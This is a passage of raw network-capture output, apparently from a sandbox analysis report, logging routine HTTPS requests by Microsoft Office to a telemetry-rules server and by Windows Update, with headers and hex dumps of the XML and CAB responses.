                                                                                                                                                                                        x-azure-ref: 20241124T011357Z-178bfbc474bvjk8shC1NYC83ns000000054g000000006rc8
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:57 UTC1952INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 31 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120680" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <SS T="1" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> <R T="2" R="120682" /> <F T="3"> <O T="LT"> <L>


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        91192.168.2.54984313.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:57 UTC192OUTGET /rules/rule120681v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:58 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:57 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 958
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:58 GMT
                                                                                                                                                                                        ETag: "0x8DC582BA0A31B3B"
                                                                                                                                                                                        x-ms-request-id: 28a3992e-001e-0028-777f-3bc49f000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011357Z-174c587ffdfb74xqhC1TEBhabc00000003mg00000000rpy3
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:58 UTC958INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 38 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 33 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120681" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120608" /> <R T="2" R="120680" /> <TH T="3"> <O T="AND"> <L> <O T="EQ"> <L>


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        92192.168.2.54984413.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:57 UTC192OUTGET /rules/rule120682v0s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:58 UTC491INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:58 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 501
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:18 GMT
                                                                                                                                                                                        ETag: "0x8DC582BACFDAACD"
                                                                                                                                                                                        x-ms-request-id: 2c6bdbd8-801e-0035-0204-3e752a000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011358Z-178bfbc474bscnbchC1NYCe7eg00000005fg000000003az2
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:58 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        93192.168.2.54984813.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:58 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:59 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:59 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 3342
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                                                        ETag: "0x8DC582B927E47E9"
                                                                                                                                                                                        x-ms-request-id: dc5ae1d1-201e-0096-3d45-3dace6000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011359Z-15b8b599d88f9wfchC1TEBm2kc00000003rg00000000n9y1
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:59 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        94192.168.2.54984713.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:58 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:13:59 UTC515INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:59 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 2592
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                                                        ETag: "0x8DC582BB5B890DB"
                                                                                                                                                                                        x-ms-request-id: bc0c8c97-701e-0053-1e45-3c3a0a000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011359Z-178bfbc474btvfdfhC1NYCa2en000000056g00000000m68y
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        X-Cache-Info: L1_T2
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:13:59 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                        95192.168.2.54985120.109.210.53443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:59 UTC306OUTGET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=r+aWDcu63agkNoh&MD=V16GSvzv HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                        User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                                                                                                        Host: slscr.update.microsoft.com
                                                                                                                                                                                        2024-11-24 01:14:00 UTC560INHTTP/1.1 200 OK
                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                        Content-Type: application/octet-stream
                                                                                                                                                                                        Expires: -1
                                                                                                                                                                                        Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                        ETag: "vic+p1MiJJ+/WMnK08jaWnCBGDfvkGRzPk9f8ZadQHg=_1440"
                                                                                                                                                                                        MS-CorrelationId: 8a3e2edc-7390-48c8-a97a-de8b9082b567
                                                                                                                                                                                        MS-RequestId: 7ce66352-811e-4447-944c-eed5230fe732
                                                                                                                                                                                        MS-CV: vFX0hDEBWkOY2gyh.0
                                                                                                                                                                                        X-Microsoft-SLSClientCache: 1440
                                                                                                                                                                                        Content-Disposition: attachment; filename=environment.cab
                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:13:59 GMT
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Content-Length: 30005
                                                                                                                                                                                        2024-11-24 01:14:00 UTC15824INData Raw: 4d 53 43 46 00 00 00 00 8d 2b 00 00 00 00 00 00 44 00 00 00 00 00 00 00 03 01 01 00 01 00 04 00 5b 49 00 00 14 00 00 00 00 00 10 00 8d 2b 00 00 a8 49 00 00 00 00 00 00 00 00 00 00 64 00 00 00 01 00 01 00 72 4d 00 00 00 00 00 00 00 00 00 00 00 00 80 00 65 6e 76 69 72 6f 6e 6d 65 6e 74 2e 63 61 62 00 fe f6 51 be 21 2b 72 4d 43 4b ed 7c 05 58 54 eb da f6 14 43 49 37 0a 02 d2 b9 86 0e 41 52 a4 1b 24 a5 bb 43 24 44 18 94 90 92 52 41 3a 05 09 95 ee 54 b0 00 91 2e e9 12 10 04 11 c9 6f 10 b7 a2 67 9f bd cf 3e ff b7 ff b3 bf 73 ed e1 9a 99 f5 c6 7a d7 bb de f5 3e cf fd 3c f7 dc 17 4a 1a 52 e7 41 a8 97 1e 14 f4 e5 25 7d f4 05 82 82 c1 20 30 08 06 ba c3 05 02 11 7f a9 c1 ff d2 87 5c 1e f4 ed 65 8e 7a 1f f6 0a 40 03 1d 7b f9 83 2c 1c 2f db b8 3a 39 3a 58 38 ba 73 5e
                                                                                                                                                                                        Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                                                                                                                                        2024-11-24 01:14:00 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                                                                                                                                        Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        96192.168.2.54985613.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:59 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:00 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1393
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                                                        x-ms-request-id: d2879cce-801e-0047-5869-3b7265000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011400Z-178bfbc474bbbqrhhC1NYCvw7400000005b000000000fbpw
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:00 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        97192.168.2.54985413.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:13:59 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:00 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 2284
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                                                        ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                                                        x-ms-request-id: 0cd55988-601e-003e-4d0c-3d3248000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011400Z-178bfbc474bbbqrhhC1NYCvw7400000005b000000000fbpx
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:00 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        98192.168.2.54985813.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:00 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:00 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:00 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1356
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                        ETag: "0x8DC582BDC681E17"
                                                                                                                                                                                        x-ms-request-id: c1a1f15b-901e-005b-358c-3a2005000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011400Z-174c587ffdfcj798hC1TEB9bq400000003ug00000000h7fr
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                        2024-11-24 01:14:00 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                        99192.168.2.54986313.107.246.63443
                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                        2024-11-24 01:14:01 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                        2024-11-24 01:14:01 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                        Date: Sun, 24 Nov 2024 01:14:01 GMT
                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                        Content-Length: 1393
                                                                                                                                                                                        Connection: close
                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                                                        ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                                                        x-ms-request-id: d30a2094-501e-0029-7248-3dd0b8000000
                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                        x-azure-ref: 20241124T011401Z-15b8b599d88wk8w4hC1TEB14b800000003qg00000000errn
                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                        Accept-Ranges: bytes
